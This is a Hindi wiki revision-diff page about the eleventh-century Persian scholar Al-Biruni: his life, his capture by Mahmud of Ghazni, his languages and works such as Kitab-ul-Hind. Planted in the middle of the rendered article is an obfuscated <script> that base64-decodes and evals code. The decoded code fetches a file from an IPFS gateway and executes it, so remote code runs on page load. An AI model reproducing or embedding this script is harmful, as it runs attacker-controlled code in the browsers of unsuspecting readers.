Difference between revisions of "अलबेरूनी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Al-Biruni.jpg|thumb|250px|अलबेरूनी]]
+
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
'''अलबेरूनी''' (973-1048 ई.) 'रबीवा' का रहने वाला था। इसका जन्म 'ख्वारिज्म' में हुआ था। 1017 ई. में ख्वारिज्म को [[महमूद ग़ज़नवी]] द्वारा जीत लिया गया। सुल्तान महमूद ग़ज़नवी के सामने अलबेरूनी को एक क़ैदी के रूप में [[ग़ज़नी]] लाया गया था। उसकी विद्वत्ता से प्रभावित होकर महमूद ग़ज़नवी ने उसे अपने राज्य का 'राज ज्योतिष' नियुक्त कर दिया। अलबेरूनी ने 'किताब उल हिन्द' नामक पुस्तक की भी रचना की थी। अलबरूनी [[अरबी भाषा|अरबी]], [[फ़ारसी भाषा|फ़ारसी]], तुर्की, [[संस्कृत]], गणित, खगोल का प्रमुख जानकर था।
+
|चित्र=Al-Biruni.jpg
 +
|चित्र का नाम=अलबेरूनी
 +
|पूरा नाम=अबु रेहान मुहम्मद बिन अहमद अल-बयरुनी
 +
|अन्य नाम=
 +
|जन्म=[[15 सितम्बर]], 973 ई.
 +
|जन्म भूमि=ख्वारिज़्म, पर्शिया
 +
|मृत्यु=[[13 दिसम्बर]], 1048 ई.
 +
|मृत्यु स्थान=[[ग़ज़नी|ग़ज़नी]], [[अफ़ग़ानिस्तान]]
 +
|अविभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|गुरु=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=
 +
|मुख्य रचनाएँ=‘दि क्रोनोलॉजी ऑफ़ एसेण्ट नेशन्स’ (पुरानी कौमों का इतिहास), 'तहकीक-ए-हिन्द', 'किताब उल हिन्द' आदि
 +
|विषय=
 +
|खोज=
 +
|भाषा=[[अरबी भाषा|अरबी]], [[फ़ारसी भाषा|फ़ारसी]], तुर्की, [[संस्कृत]]
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=विद्वान लेखक, वैज्ञानिक, धर्मज्ञ तथा विचारक
 +
|विशेष योगदान=
 +
|नागरिकता=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|अन्य जानकारी=अलबेरूनी को [[भारतीय इतिहास]] का पहला जानकार कहा जाता है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''अलबेरूनी''' (973-1048 ई.) एक फ़ारसी विद्वान लेखक, वैज्ञानिक, धर्मज्ञ तथा विचारक था। अलबेरूनी 'रबीवा' का रहने वाला था। इसका जन्म 'ख्वारिज़्म' में हुआ था। 1017 ई. में ख्वारिज़्म को [[महमूद ग़ज़नवी]] द्वारा जीत लिया गया। सुल्तान महमूद ग़ज़नवी के सामने अलबेरूनी को एक क़ैदी के रूप में [[ग़ज़नी]] लाया गया था। उसकी विद्वत्ता से प्रभावित होकर महमूद ग़ज़नवी ने उसे अपने राज्य का 'राज ज्योतिष' नियुक्त कर दिया। अलबेरूनी ने 'किताब उल हिन्द' नामक पुस्तक की भी रचना की थी। अलबरूनी [[अरबी भाषा|अरबी]], [[फ़ारसी भाषा|फ़ारसी]], तुर्की, [[संस्कृत]], गणित, खगोल का प्रमुख जानकर था।
 
*अलबेरूनी द्वारा रचित कुल 14 पुस्तकों में 'किताब उल हिन्द' सबसे अधिक लोकप्रिय पुस्तक थी।
 
*अलबेरूनी द्वारा रचित कुल 14 पुस्तकों में 'किताब उल हिन्द' सबसे अधिक लोकप्रिय पुस्तक थी।
 
*उसकी इस पुस्तक को दक्षिण [[एशिया]] के [[इतिहास]] का प्रमुख स्रोत माना जाता है।
 
*उसकी इस पुस्तक को दक्षिण [[एशिया]] के [[इतिहास]] का प्रमुख स्रोत माना जाता है।
Line 7: Line 46:
 
*वह बड़ा विद्वान था। भारत में रहकर उसने [[संस्कृत]] को बड़े ही प्रेमपूर्वक विषय के रूप में पढ़ा तथा [[हिन्दू]] दर्शन तथा दूसरे शास्त्रों का भी गहराई से अध्ययन किया।
 
*वह बड़ा विद्वान था। भारत में रहकर उसने [[संस्कृत]] को बड़े ही प्रेमपूर्वक विषय के रूप में पढ़ा तथा [[हिन्दू]] दर्शन तथा दूसरे शास्त्रों का भी गहराई से अध्ययन किया।
 
*इसी अध्ययन के आधार पर उसने ‘तहकीक-ए-हिन्द’ (भारत की खोज) नामक पुस्तक की रचना की थी।
 
*इसी अध्ययन के आधार पर उसने ‘तहकीक-ए-हिन्द’ (भारत की खोज) नामक पुस्तक की रचना की थी।
*इस पुक्तक में हिन्दुओं के इतिहास, चरित्र, आचार-व्यवहार, परम्पराओं और वैज्ञानिक ज्ञान का विशद वर्णन किया गया है।
+
*इस पुस्तक में हिन्दुओं के इतिहास, चरित्र, आचार-व्यवहार, परम्पराओं और वैज्ञानिक ज्ञान का विशद वर्णन किया गया है।
 
*इसमें [[मुसलमान|मुसलमानों]] के आक्रमण के पहले के [[भारत का इतिहास|भारतीय इतिहास]] और संस्कृति का प्रामाणिक और अमूल्य विवरण मिलता है।
 
*इसमें [[मुसलमान|मुसलमानों]] के आक्रमण के पहले के [[भारत का इतिहास|भारतीय इतिहास]] और संस्कृति का प्रामाणिक और अमूल्य विवरण मिलता है।
 
*उसकी अनेक पुस्तकें अप्राप्य हैं, लेकिन जो मिलता है, उसमें सचाऊ द्वारा [[अंग्रेज़ी भाषा]] में अनूदित ‘दि क्रोनोलॉजी ऑफ़ एसेण्ट नेशन्स’ (पुरानी कौमों का इतिहास) उसकी विद्वत्ता को सिद्ध करने के लिए पर्याप्त है।
 
*उसकी अनेक पुस्तकें अप्राप्य हैं, लेकिन जो मिलता है, उसमें सचाऊ द्वारा [[अंग्रेज़ी भाषा]] में अनूदित ‘दि क्रोनोलॉजी ऑफ़ एसेण्ट नेशन्स’ (पुरानी कौमों का इतिहास) उसकी विद्वत्ता को सिद्ध करने के लिए पर्याप्त है।

Revision as of 14:07, 8 April 2013

alaberooni
poora nam abu rehan muhammad bin ahamad al-bayaruni
janm 15 sitambar, 973 ee.
janm bhoomi khvarizm, parshiya
mrityu 13 disambar, 1048 ee.
mrityu sthan gazani, afaganistan
mukhy rachanaean ‘di kronol aauji aauf esent neshans’ (purani kaumoan ka itihas), 'tahakik-e-hind', 'kitab ul hind' adi
bhasha arabi, farasi, turki, sanskrit
prasiddhi vidvan lekhak, vaijnanik, dharmajn tatha vicharak
any janakari alaberooni ko bharatiy itihas ka pahala janakar kaha jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

alaberooni (973-1048 ee.) ek farasi vidvan lekhak, vaijnanik, dharmajn tatha vicharak tha. alaberooni 'rabiva' ka rahane vala tha. isaka janm 'khvarizm' mean hua tha. 1017 ee. mean khvarizm ko mahamood gazanavi dvara jit liya gaya. sultan mahamood gazanavi ke samane alaberooni ko ek qaidi ke roop mean gazani laya gaya tha. usaki vidvatta se prabhavit hokar mahamood gazanavi ne use apane rajy ka 'raj jyotish' niyukt kar diya. alaberooni ne 'kitab ul hind' namak pustak ki bhi rachana ki thi. alabarooni arabi, farasi, turki, sanskrit, ganit, khagol ka pramukh janakar tha.

  • alaberooni dvara rachit kul 14 pustakoan mean 'kitab ul hind' sabase adhik lokapriy pustak thi.
  • usaki is pustak ko dakshin eshiya ke itihas ka pramukh srot mana jata hai.
  • sultan mahamood gazanavi ki sena ke sath alaberooni bharat aya aur kee varshoan tak panjab mean raha.
  • usaka asali nam 'aboo raihan muhammad' tha, lekin vah ‘alaberooni’ ke nam se hi adhik prasiddh hai, jisaka arth hota hai, ‘ustad’.
  • vah b da vidvan tha. bharat mean rahakar usane sanskrit ko b de hi premapoorvak vishay ke roop mean padha tatha hindoo darshan tatha doosare shastroan ka bhi gaharaee se adhyayan kiya.
  • isi adhyayan ke adhar par usane ‘tahakik-e-hind’ (bharat ki khoj) namak pustak ki rachana ki thi.
  • is pustak mean hinduoan ke itihas, charitr, achar-vyavahar, paramparaoan aur vaijnanik jnan ka vishad varnan kiya gaya hai.
  • isamean musalamanoan ke akraman ke pahale ke bharatiy itihas aur sanskriti ka pramanik aur amooly vivaran milata hai.
  • usaki anek pustakean aprapy haian, lekin jo milata hai, usamean sachaoo dvara aangrezi bhasha mean anoodit ‘di kronol aauji aauf esent neshans’ (purani kaumoan ka itihas) usaki vidvatta ko siddh karane ke lie paryapt hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh